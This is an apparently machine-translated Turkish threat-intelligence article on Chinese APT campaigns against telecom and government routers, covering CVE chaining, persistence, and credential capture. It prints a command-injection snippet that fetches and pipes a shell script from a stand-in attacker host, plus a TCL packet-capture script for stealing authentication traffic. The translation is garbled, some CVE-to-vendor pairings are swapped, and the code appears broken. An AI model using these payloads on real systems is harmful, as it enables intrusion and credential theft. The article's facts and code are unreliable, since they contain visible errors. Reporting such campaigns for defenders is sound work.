Geçtiğimiz birkaç yıl boyunca, Çin devlet destekli ileri süren tehdit (APT) gruplarının ortak bir kampanyası, küresel telekomünikasyon ve hükümet ağları içinde uzun vadeli dayanaklar oluşturmak için kurumsal sınıf yönlendiricilerdeki kritik güvenlik açıklarından yararlandı.
Genellikle tuz tayfası ve operatör panda gibi takma adlar altında tanımlanan bu aktörler, önde gelen satıcılardan sağlayıcı kenarını (PE) ve müşteri kenarını (CE) cihazları sistematik olarak hedeflemiştir, ilk yetkisiz erişim elde etmek için halka açık ortak güvenlik açıklarından ve maruziyetlerini (CVES) kullanırlar.
Operasyonları, yanal olarak hareket etmek ve geleneksel algılama araçlarından kaçmak için çoklu istismarları zincirleyen yüksek derecede gizlilik göstermiştir.
Tipik çok aşamalı saldırı akışı, bir web bileşeni enjeksiyonu ile başlar ve gömülü paket yakalama ile sonuçlanır.
İlk saldırı denemelerinde, tehdit aktörleri genellikle Ivanti Connect Secure ve CVE-2024-3400’de Palo Alto Networks Pan-OS GlobalProtect’te CVE-2024-21887’den yararlanır.
Bu kusurlar, hazırlanmış HTTP istekleri aracılığıyla uzaktan kod yürütülmesine izin vererek saldırganlara yönlendiricinin ayrıcalıklı yönetim arayüzünde bir dayanak verdi.
Araştırmacılar, erişim sağlandıktan sonra, aktörlerin hızlı bir şekilde döndüğünü, Cisco IOS Smart Install’da CVE-2018-0171 gibi eski güvenlik açıklarını ve iOS XE Web yönetim modüllerinde CVE-2023-20198 gibi, güvenilir bir yükselme ve kalıcılık zinciri oluşturduğunu belirttiler.
Cyble analistleri, genellikle belirli yönlendirici ortamlarına uyacak şekilde Python veya TCL komut dosyalarına göre uyarlanmış halka açık kavram kanıtı sömürü kodunun hızlı bir şekilde silahlandırılmasını belirledi.
Web yönetimi arayüzü aracılığıyla komut enjeksiyonunu gösteren bu kampanyalarda kullanılan temsili bir snippet burada gösterilmiştir:-
import requests
url = "https[:]//192.0.2.1/+CSCOE+/translation-table?type=misc&text_scale=1"
payload = {"command"[:] "system ('curl http[:]//attacker.com/shell[.]sh | sh')"}
response = requests[.]post (url, data=payload, verify=False)
print (response[.]status_code, response[.]text)Bu teknikten yararlanarak, saldırganlar uzaktan kabuk yürütme sağlar, daha sonra yapılandırma dosyalarını, kimlik bilgilerini ve oturum verilerini hasat etmek için özel araçlar dağıtır.
Kalıcılık taktikleri
İlk erişimden sonra, Çin APT grupları uzun ömürlülüğü sağlamak için kendilerini yönlendiricinin çalışma ortamına derinlemesine yerleştirmeye odaklanır.
Erişim kontrol listelerini (ACL’ler) beyaz liste saldırgan kontrollü IP adreslerine ve gizli erişim için 32768 ve 8081 gibi standart olmayan bağlantı noktalarına değiştirirler.
Birçok durumda, malefaktörler Cisco’nun gömülü paket yakalama (EPC) işlevselliğini Sifon Tacacs+ ve Radius kimlik doğrulama trafiğine kullanır ve açık metin kimlik bilgilerini etkili bir şekilde toplar. Bunu otomatikleştirmek için, yönlendiricinin flash belleğinde depolanan TCL tabanlı komut dosyalarını dağıtırlar:
package require json
set cap Cmd [list "ip" "packet" "capture" "point-to-point" "rtl" "1000"]
exec {*}$capCmd > flash:auth_capture[.]pcapBu komut dosyaları önyükleme zamanında çalışır, değiştirilmiş başlangıç konfigürasyonları yoluyla tetiklenir ve şifreli GRE tünelleri üzerinde periyodik olarak açıklanmış kalıcı PCAP dosyaları oluşturur.
AAA (kimlik doğrulama, yetkilendirme, muhasebe) yapılandırmasını manipüle ederek, aktörler günlükleri yeniden yönlendirir ve özellikleri devre dışı bırakır ve kurumsal savunucuları etkili bir şekilde kör eder.
Bu yöntemler sayesinde, tehlikeye atılan cihazlar daha geniş kurumsal infiltrasyon için güvenilir bir fırlatma rampası haline gelir ve APT aktörlerinin aylar hatta yıllarca gizli bir varlığı sürdürmesine izin verir.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.